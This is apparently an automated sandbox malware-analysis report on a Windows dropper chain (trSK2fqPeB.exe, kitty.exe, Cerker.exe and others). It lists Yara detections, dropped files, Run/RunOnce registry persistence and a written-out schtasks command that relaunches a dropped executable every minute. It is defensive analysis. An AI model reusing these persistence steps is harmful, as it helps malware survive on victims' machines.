Source: Yara match	File source: 37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b29037c760.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.52i.exe.202f80f5ca8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b2905d55a8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.YAPNXRPmcarcR4ZDgC81Tbdk.exe.209df53c760.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.IIZS2TRqf69aZbLAX3cf3edn.exe.1cd28ea5570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.52i.exe.202f7e9ce60.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.181682154c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.IIZS2TRqf69aZbLAX3cf3edn.exe.1cd28cc4728.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b280095d60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.YAPNXRPmcarcR4ZDgC81Tbdk.exe.209df514728.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b290354728.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.18168445570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.18168060d08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b290354728.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.IIZS2TRqf69aZbLAX3cf3edn.exe.1cd28cc4728.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.YAPNXRPmcarcR4ZDgC81Tbdk.exe.209df6f5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b280095d60.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.52i.exe.202f8055c70.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.IIZS2TRqf69aZbLAX3cf3edn.exe.1cd18870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.YAPNXRPmcarcR4ZDgC81Tbdk.exe.209df514728.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.18157f5e920.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.52i.exe.202f7e74e28.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.52i.exe.202f7e74e28.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2247277729.000001CD28F45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.4131368164.0000020D46AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2247277729.000001CD28CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1976643095.000001D99A351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1805008168.00000202F8055000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2144035452.00000209CF22E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1805008168.00000202F80F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2247277729.000001CD28CEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2158620640.000002B2905D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2158620640.000002B290305000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2040138545.000001CD18870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2205943039.00000209DF53C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2078804630.0000018167F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2065045219.000001815801C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2205943039.00000209DF514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1805008168.00000202F7E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1762236134.00000202E7B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2247277729.000001CD28EA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2158620640.000002B290535000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2205943039.00000209DF6F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2078804630.0000018168215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1748882115.00000202804D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2144035452.00000209CF270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2065045219.0000018157F36000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2205943039.00000209DF795000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2051647717.000001CD18971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 52i.exe PID: 7972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TypeId.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 8160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 4628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 7032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: YAPNXRPmcarcR4ZDgC81Tbdk.exe PID: 7156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SmLAztxc1o8yfogkJXrRjbDt.exe PID: 7320, type: MEMORYSTR

Source: trSK2fqPeB.exe

Static PE information: 0xD768CC16 [Sun Jul 9 08:23:50 2084 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 15_2_0042DB49 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

15_2_0042DB49

Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Code function: 3_2_00007FFD9BAB924B push ds; ret	3_2_00007FFD9BAB924F
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Code function: 3_2_00007FFD9BAB67CD pushfd ; iretd	3_2_00007FFD9BAB67E2
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Code function: 3_2_00007FFD9BAB668D pushfd ; iretd	3_2_00007FFD9BAB67E2
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Code function: 3_2_00007FFD9BAB74C3 push ebx; iretd	3_2_00007FFD9BAB756A
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Code function: 4_2_001F02B4 push ecx; ret	4_2_001F02C7
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 7_2_008E02B4 push ecx; ret	7_2_008E02C7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B99D2A5 pushad ; iretd	11_2_00007FFD9B99D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9BAB1C5D push E95E51B7h; ret	11_2_00007FFD9BAB1C79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9BB88A19 push esp; iretd	11_2_00007FFD9BB88A3A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9BB89541 push esi; iretd	11_2_00007FFD9BB89542
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Code function: 12_2_00007FFD9BA9924B push ds; ret	12_2_00007FFD9BA9924F
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Code function: 12_2_00007FFD9BA967CD pushfd ; iretd	12_2_00007FFD9BA967E2
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Code function: 12_2_00007FFD9BA9668D pushfd ; iretd	12_2_00007FFD9BA967E2
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Code function: 12_2_00007FFD9BA974C3 push ebx; iretd	12_2_00007FFD9BA9756A
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Code function: 12_2_00007FFD9BB71DBB push ebx; retf	12_2_00007FFD9BB71E2A
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Code function: 12_2_00007FFD9BB70660 pushad ; retf	12_2_00007FFD9BB70661
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Code function: 12_2_00007FFD9BB71E9B push edi; retf	12_2_00007FFD9BB71F0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041F4CC push ecx; ret	15_2_0041F4DF
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Code function: 23_2_00007FFD9BAD435E push esi; ret	23_2_00007FFD9BAD435F
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Code function: 23_2_00007FFD9BAD19AD push eax; ret	23_2_00007FFD9BAD19F1
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Code function: 23_2_00007FFD9BAD4C70 push esp; iretd	23_2_00007FFD9BAD4C73
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Code function: 30_2_00007FFD9BA900BD pushad ; iretd	30_2_00007FFD9BA900C1
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Code function: 37_2_00007FFD9BAC435E push esi; ret	37_2_00007FFD9BAC435F
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Code function: 37_2_00007FFD9BAC19AD push eax; ret	37_2_00007FFD9BAC19F1
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Code function: 37_2_00007FFD9BAC4C70 push esp; iretd	37_2_00007FFD9BAC4C73
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Code function: 38_2_00007FFD9BA9435E push esi; ret	38_2_00007FFD9BA9435F
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Code function: 38_2_00007FFD9BA919AD push eax; ret	38_2_00007FFD9BA919F1
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Code function: 38_2_00007FFD9BA94C70 push esp; iretd	38_2_00007FFD9BA94C73
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	Code function: 40_2_00007FFD9BAB435E push esi; ret	40_2_00007FFD9BAB435F
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	Code function: 40_2_00007FFD9BAB19AD push eax; ret	40_2_00007FFD9BAB19F1
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	Code function: 40_2_00007FFD9BAB4C70 push esp; iretd	40_2_00007FFD9BAB4C73

Source: 52i[1].exe.2.dr	Static PE information: section name: .text entropy: 7.9556690584212
Source: 52i.exe.2.dr	Static PE information: section name: .text entropy: 7.9556690584212
Source: ovrflw[1].exe.2.dr	Static PE information: section name: .text entropy: 7.330049636271056
Source: ovrflw.exe.2.dr	Static PE information: section name: .text entropy: 7.330049636271056

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\trSK2fqPeB.exe

File created: C:\Users\user\Pictures\Illumination.pif

Jump to dropped file

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 0000000C.00000002.1976643095.000001D99A7E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 52i.exe PID: 7972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TypeId.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 8160, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	File created: C:\Users\user\Pictures\Illumination.pif	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\kitty[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ovrflw[1].exe	Jump to dropped file
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	File created: C:\Users\user\Windows.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	File created: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	File created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\52i[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File created: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	File created: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Jump to dropped file

Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe

File created: C:\Users\user\Windows.exe

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup			Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Network Agent
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce IlluminatedControls	Jump to behavior

Drops PE files to the user root directory

Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe

File created: C:\Users\user\Windows.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 0000000C.00000002.1976643095.000001D99A7E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 52i.exe PID: 7972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TypeId.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 8160, type: MEMORYSTR

Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce IlluminatedControls	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce IlluminatedControls	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce IlluminatedControls	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce IlluminatedControls	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe	Jump to behavior
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Network Agent
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Network Agent

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe

Code function: 4_2_001EF8E2 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_001EF8E2

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\0229f281e62ef8a44cd91793664cb790 AF4480A28E0E06122A672E07DF0979CB

Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
